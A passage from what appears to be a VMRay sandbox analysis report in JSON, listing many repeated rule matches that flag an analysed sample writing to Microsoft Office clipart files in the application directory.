"version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42337", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03011u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03012U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03012u.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42344", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03012u.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03014_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42351", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03014_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03041i.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42360", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03041i.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03143i.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42369", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03143i.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03205i.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42378", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03205i.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03224I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03224i.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42389", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03224i.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03379i.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42400", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03379i.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03380i.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42407", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03380i.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03425i.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42414", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03425i.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRT.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\prrt.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42425", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\prrt.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\prrtinst.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42432", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\prrtinst.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSRETRO.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\psretro.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42441", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\psretro.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETLG.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pssketlg.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42448", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pssketlg.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETSM.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pssketsm.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42455", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pssketsm.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSWAVY.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pswavy.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42462", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\pswavy.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RE00006_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\re00006_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42469", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\re00006_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\RECYCLE.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\recycle.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42476", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\recycle.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42483", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42490", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42497", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SHOW_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42504", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\show_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00256_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00256_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42511", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00256_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00260_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42518", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00260_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00268_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00268_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42527", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00268_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00286_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00286_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42534", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00286_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00298_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00298_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42541", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00298_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00308_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00308_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42548", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00308_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00345_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00345_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42555", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00345_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00452_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00452_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42562", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00452_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00712_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00712_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42569", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00712_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01040_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01040_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42576", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01040_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01041_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01041_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_42583", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01041_.wmf\".", "technique_path": 